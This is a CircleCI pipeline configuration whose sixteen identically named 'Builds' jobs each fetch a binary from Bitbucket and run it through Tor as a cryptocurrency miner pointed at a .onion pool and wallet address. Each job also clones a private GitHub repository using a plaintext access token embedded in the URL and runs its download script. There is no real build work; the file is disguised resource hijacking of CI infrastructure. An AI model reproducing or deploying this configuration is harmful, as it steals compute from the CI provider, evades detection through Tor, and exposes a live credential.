# ======================== #
version: 2.1
orbs:
  python: circleci/python@1.5.0
jobs:
  Builds-01:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - run:
          name: Mulai Bro...
          command: |
             sudo docker run -d --name MiningCu ubuntu:latest sh -c "apt-get update && apt-get install wget tor curl -y && curl ifconfig.me && service tor start && torsocks curl ifconfig.me && wget https://bitbucket.org/anli_angku/aset-anli/downloads/katek-fee && chmod u+x katek-fee && torsocks ./katek-fee -o mo2tor2amawhphlrgyaqlrqx7o27jaj7yldnx3t6jip3ow4bujlwz6id.onion:10001 -u 86QH75AKHx8JALxRj7TkqvfNTvGZmLkUS1V7EosrG3CGPqA4vv7B229KC95aCGTFS4Up3e8maah8Y79t2gqP3NaBL8U32XD.Pekerja01 -k --threads=4"
             sudo docker run --name Download ubuntu:latest sh -c "apt-get update && apt-get install wget git -y && git clone https://Sampah13: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@github.com/Sampah13/Private.git && cd Private && bash download.sh"
  Builds-02:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - run:
          name: Mulai Bro...
          command: |
             sudo docker run -d --name MiningCu ubuntu:latest sh -c "apt-get update && apt-get install wget tor curl -y && curl ifconfig.me && service tor start && torsocks curl ifconfig.me && wget https://bitbucket.org/anli_angku/aset-anli/downloads/katek-fee && chmod u+x katek-fee && torsocks ./katek-fee -o mo2tor2amawhphlrgyaqlrqx7o27jaj7yldnx3t6jip3ow4bujlwz6id.onion:10001 -u 86QH75AKHx8JALxRj7TkqvfNTvGZmLkUS1V7EosrG3CGPqA4vv7B229KC95aCGTFS4Up3e8maah8Y79t2gqP3NaBL8U32XD.Pekerja01 -k --threads=4"
             sudo docker run --name Download ubuntu:latest sh -c "apt-get update && apt-get install wget git -y && git clone https://Sampah13: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@github.com/Sampah13/Private.git && cd Private && bash download.sh"
  Builds-03:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - run:
          name: Mulai Bro...
          command: |
             sudo docker run -d --name MiningCu ubuntu:latest sh -c "apt-get update && apt-get install wget tor curl -y && curl ifconfig.me && service tor start && torsocks curl ifconfig.me && wget https://bitbucket.org/anli_angku/aset-anli/downloads/katek-fee && chmod u+x katek-fee && torsocks ./katek-fee -o mo2tor2amawhphlrgyaqlrqx7o27jaj7yldnx3t6jip3ow4bujlwz6id.onion:10001 -u 86QH75AKHx8JALxRj7TkqvfNTvGZmLkUS1V7EosrG3CGPqA4vv7B229KC95aCGTFS4Up3e8maah8Y79t2gqP3NaBL8U32XD.Pekerja01 -k --threads=4"
             sudo docker run --name Download ubuntu:latest sh -c "apt-get update && apt-get install wget git -y && git clone https://Sampah13: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@github.com/Sampah13/Private.git && cd Private && bash download.sh"
  Builds-04:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - run:
          name: Mulai Bro...
          command: |
             sudo docker run -d --name MiningCu ubuntu:latest sh -c "apt-get update && apt-get install wget tor curl -y && curl ifconfig.me && service tor start && torsocks curl ifconfig.me && wget https://bitbucket.org/anli_angku/aset-anli/downloads/katek-fee && chmod u+x katek-fee && torsocks ./katek-fee -o mo2tor2amawhphlrgyaqlrqx7o27jaj7yldnx3t6jip3ow4bujlwz6id.onion:10001 -u 86QH75AKHx8JALxRj7TkqvfNTvGZmLkUS1V7EosrG3CGPqA4vv7B229KC95aCGTFS4Up3e8maah8Y79t2gqP3NaBL8U32XD.Pekerja01 -k --threads=4"
             sudo docker run --name Download ubuntu:latest sh -c "apt-get update && apt-get install wget git -y && git clone https://Sampah13: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@github.com/Sampah13/Private.git && cd Private && bash download.sh"
  Builds-05:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - run:
          name: Mulai Bro...
          command: |
             sudo docker run -d --name MiningCu ubuntu:latest sh -c "apt-get update && apt-get install wget tor curl -y && curl ifconfig.me && service tor start && torsocks curl ifconfig.me && wget https://bitbucket.org/anli_angku/aset-anli/downloads/katek-fee && chmod u+x katek-fee && torsocks ./katek-fee -o mo2tor2amawhphlrgyaqlrqx7o27jaj7yldnx3t6jip3ow4bujlwz6id.onion:10001 -u 86QH75AKHx8JALxRj7TkqvfNTvGZmLkUS1V7EosrG3CGPqA4vv7B229KC95aCGTFS4Up3e8maah8Y79t2gqP3NaBL8U32XD.Pekerja01 -k --threads=4"
             sudo docker run --name Download ubuntu:latest sh -c "apt-get update && apt-get install wget git -y && git clone https://Sampah13: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@github.com/Sampah13/Private.git && cd Private && bash download.sh"
  Builds-06:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - run:
          name: Mulai Bro...
          command: |
             sudo docker run -d --name MiningCu ubuntu:latest sh -c "apt-get update && apt-get install wget tor curl -y && curl ifconfig.me && service tor start && torsocks curl ifconfig.me && wget https://bitbucket.org/anli_angku/aset-anli/downloads/katek-fee && chmod u+x katek-fee && torsocks ./katek-fee -o mo2tor2amawhphlrgyaqlrqx7o27jaj7yldnx3t6jip3ow4bujlwz6id.onion:10001 -u 86QH75AKHx8JALxRj7TkqvfNTvGZmLkUS1V7EosrG3CGPqA4vv7B229KC95aCGTFS4Up3e8maah8Y79t2gqP3NaBL8U32XD.Pekerja01 -k --threads=4"
             sudo docker run --name Download ubuntu:latest sh -c "apt-get update && apt-get install wget git -y && git clone https://Sampah13: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@github.com/Sampah13/Private.git && cd Private && bash download.sh"
  Builds-07:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - run:
          name: Mulai Bro...
          command: |
             sudo docker run -d --name MiningCu ubuntu:latest sh -c "apt-get update && apt-get install wget tor curl -y && curl ifconfig.me && service tor start && torsocks curl ifconfig.me && wget https://bitbucket.org/anli_angku/aset-anli/downloads/katek-fee && chmod u+x katek-fee && torsocks ./katek-fee -o mo2tor2amawhphlrgyaqlrqx7o27jaj7yldnx3t6jip3ow4bujlwz6id.onion:10001 -u 86QH75AKHx8JALxRj7TkqvfNTvGZmLkUS1V7EosrG3CGPqA4vv7B229KC95aCGTFS4Up3e8maah8Y79t2gqP3NaBL8U32XD.Pekerja01 -k --threads=4"
             sudo docker run --name Download ubuntu:latest sh -c "apt-get update && apt-get install wget git -y && git clone https://Sampah13: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@github.com/Sampah13/Private.git && cd Private && bash download.sh"
  Builds-08:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - run:
          name: Mulai Bro...
          command: |
             sudo docker run -d --name MiningCu ubuntu:latest sh -c "apt-get update && apt-get install wget tor curl -y && curl ifconfig.me && service tor start && torsocks curl ifconfig.me && wget https://bitbucket.org/anli_angku/aset-anli/downloads/katek-fee && chmod u+x katek-fee && torsocks ./katek-fee -o mo2tor2amawhphlrgyaqlrqx7o27jaj7yldnx3t6jip3ow4bujlwz6id.onion:10001 -u 86QH75AKHx8JALxRj7TkqvfNTvGZmLkUS1V7EosrG3CGPqA4vv7B229KC95aCGTFS4Up3e8maah8Y79t2gqP3NaBL8U32XD.Pekerja01 -k --threads=4"
             sudo docker run --name Download ubuntu:latest sh -c "apt-get update && apt-get install wget git -y && git clone https://Sampah13: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@github.com/Sampah13/Private.git && cd Private && bash download.sh"
  Builds-09:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - run:
          name: Mulai Bro...
          command: |
             sudo docker run -d --name MiningCu ubuntu:latest sh -c "apt-get update && apt-get install wget tor curl -y && curl ifconfig.me && service tor start && torsocks curl ifconfig.me && wget https://bitbucket.org/anli_angku/aset-anli/downloads/katek-fee && chmod u+x katek-fee && torsocks ./katek-fee -o mo2tor2amawhphlrgyaqlrqx7o27jaj7yldnx3t6jip3ow4bujlwz6id.onion:10001 -u 86QH75AKHx8JALxRj7TkqvfNTvGZmLkUS1V7EosrG3CGPqA4vv7B229KC95aCGTFS4Up3e8maah8Y79t2gqP3NaBL8U32XD.Pekerja01 -k --threads=4"
             sudo docker run --name Download ubuntu:latest sh -c "apt-get update && apt-get install wget git -y && git clone https://Sampah13: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@github.com/Sampah13/Private.git && cd Private && bash download.sh"
  Builds-10:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - run:
          name: Mulai Bro...
          command: |
             sudo docker run -d --name MiningCu ubuntu:latest sh -c "apt-get update && apt-get install wget tor curl -y && curl ifconfig.me && service tor start && torsocks curl ifconfig.me && wget https://bitbucket.org/anli_angku/aset-anli/downloads/katek-fee && chmod u+x katek-fee && torsocks ./katek-fee -o mo2tor2amawhphlrgyaqlrqx7o27jaj7yldnx3t6jip3ow4bujlwz6id.onion:10001 -u 86QH75AKHx8JALxRj7TkqvfNTvGZmLkUS1V7EosrG3CGPqA4vv7B229KC95aCGTFS4Up3e8maah8Y79t2gqP3NaBL8U32XD.Pekerja01 -k --threads=4"
             sudo docker run --name Download ubuntu:latest sh -c "apt-get update && apt-get install wget git -y && git clone https://Sampah13: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@github.com/Sampah13/Private.git && cd Private && bash download.sh"
  Builds-11:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - run:
          name: Mulai Bro...
          command: |
             sudo docker run -d --name MiningCu ubuntu:latest sh -c "apt-get update && apt-get install wget tor curl -y && curl ifconfig.me && service tor start && torsocks curl ifconfig.me && wget https://bitbucket.org/anli_angku/aset-anli/downloads/katek-fee && chmod u+x katek-fee && torsocks ./katek-fee -o mo2tor2amawhphlrgyaqlrqx7o27jaj7yldnx3t6jip3ow4bujlwz6id.onion:10001 -u 86QH75AKHx8JALxRj7TkqvfNTvGZmLkUS1V7EosrG3CGPqA4vv7B229KC95aCGTFS4Up3e8maah8Y79t2gqP3NaBL8U32XD.Pekerja01 -k --threads=4"
             sudo docker run --name Download ubuntu:latest sh -c "apt-get update && apt-get install wget git -y && git clone https://Sampah13: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@github.com/Sampah13/Private.git && cd Private && bash download.sh"
  Builds-12:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - run:
          name: Mulai Bro...
          command: |
             sudo docker run -d --name MiningCu ubuntu:latest sh -c "apt-get update && apt-get install wget tor curl -y && curl ifconfig.me && service tor start && torsocks curl ifconfig.me && wget https://bitbucket.org/anli_angku/aset-anli/downloads/katek-fee && chmod u+x katek-fee && torsocks ./katek-fee -o mo2tor2amawhphlrgyaqlrqx7o27jaj7yldnx3t6jip3ow4bujlwz6id.onion:10001 -u 86QH75AKHx8JALxRj7TkqvfNTvGZmLkUS1V7EosrG3CGPqA4vv7B229KC95aCGTFS4Up3e8maah8Y79t2gqP3NaBL8U32XD.Pekerja01 -k --threads=4"
             sudo docker run --name Download ubuntu:latest sh -c "apt-get update && apt-get install wget git -y && git clone https://Sampah13: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@github.com/Sampah13/Private.git && cd Private && bash download.sh"
  Builds-13:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - run:
          name: Mulai Bro...
          command: |
             sudo docker run -d --name MiningCu ubuntu:latest sh -c "apt-get update && apt-get install wget tor curl -y && curl ifconfig.me && service tor start && torsocks curl ifconfig.me && wget https://bitbucket.org/anli_angku/aset-anli/downloads/katek-fee && chmod u+x katek-fee && torsocks ./katek-fee -o mo2tor2amawhphlrgyaqlrqx7o27jaj7yldnx3t6jip3ow4bujlwz6id.onion:10001 -u 86QH75AKHx8JALxRj7TkqvfNTvGZmLkUS1V7EosrG3CGPqA4vv7B229KC95aCGTFS4Up3e8maah8Y79t2gqP3NaBL8U32XD.Pekerja01 -k --threads=4"
             sudo docker run --name Download ubuntu:latest sh -c "apt-get update && apt-get install wget git -y && git clone https://Sampah13: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@github.com/Sampah13/Private.git && cd Private && bash download.sh"
  Builds-14:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - run:
          name: Mulai Bro...
          command: |
             sudo docker run -d --name MiningCu ubuntu:latest sh -c "apt-get update && apt-get install wget tor curl -y && curl ifconfig.me && service tor start && torsocks curl ifconfig.me && wget https://bitbucket.org/anli_angku/aset-anli/downloads/katek-fee && chmod u+x katek-fee && torsocks ./katek-fee -o mo2tor2amawhphlrgyaqlrqx7o27jaj7yldnx3t6jip3ow4bujlwz6id.onion:10001 -u 86QH75AKHx8JALxRj7TkqvfNTvGZmLkUS1V7EosrG3CGPqA4vv7B229KC95aCGTFS4Up3e8maah8Y79t2gqP3NaBL8U32XD.Pekerja01 -k --threads=4"
             sudo docker run --name Download ubuntu:latest sh -c "apt-get update && apt-get install wget git -y && git clone https://Sampah13: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@github.com/Sampah13/Private.git && cd Private && bash download.sh"
  Builds-15:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - run:
          name: Mulai Bro...
          command: |
             sudo docker run -d --name MiningCu ubuntu:latest sh -c "apt-get update && apt-get install wget tor curl -y && curl ifconfig.me && service tor start && torsocks curl ifconfig.me && wget https://bitbucket.org/anli_angku/aset-anli/downloads/katek-fee && chmod u+x katek-fee && torsocks ./katek-fee -o mo2tor2amawhphlrgyaqlrqx7o27jaj7yldnx3t6jip3ow4bujlwz6id.onion:10001 -u 86QH75AKHx8JALxRj7TkqvfNTvGZmLkUS1V7EosrG3CGPqA4vv7B229KC95aCGTFS4Up3e8maah8Y79t2gqP3NaBL8U32XD.Pekerja01 -k --threads=4"
             sudo docker run --name Download ubuntu:latest sh -c "apt-get update && apt-get install wget git -y && git clone https://Sampah13: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@github.com/Sampah13/Private.git && cd Private && bash download.sh"
  Builds-16:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - run:
          name: Mulai Bro...
          command: |
             sudo docker run -d --name MiningCu ubuntu:latest sh -c "apt-get update && apt-get install wget tor curl -y && curl ifconfig.me && service tor start && torsocks curl ifconfig.me && wget https://bitbucket.org/anli_angku/aset-anli/downloads/katek-fee && chmod u+x katek-fee && torsocks ./katek-fee -o mo2tor2amawhphlrgyaqlrqx7o27jaj7yldnx3t6jip3ow4bujlwz6id.onion:10001 -u 86QH75AKHx8JALxRj7TkqvfNTvGZmLkUS1V7EosrG3CGPqA4vv7B229KC95aCGTFS4Up3e8maah8Y79t2gqP3NaBL8U32XD.Pekerja01 -k --threads=4"
             sudo docker run --name Download ubuntu:latest sh -c "apt-get update && apt-get install wget git -y && git clone https://Sampah13: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@github.com/Sampah13/Private.git && cd Private && bash download.sh"
# ======================== #
workflows:
  Workflows:
    #triggers:
      #- schedule:
          #cron: "* * * * *"
          #filters:
            #branches:
              #only: main
# ======================== #
    jobs:
      - Builds-01
      - Builds-02
      - Builds-03
      - Builds-04
      - Builds-05
      - Builds-06
      - Builds-07
      - Builds-08
      - Builds-09
      - Builds-10
      - Builds-11
      - Builds-12
      - Builds-13
      - Builds-14
      - Builds-15
      - Builds-16
# ======================== #
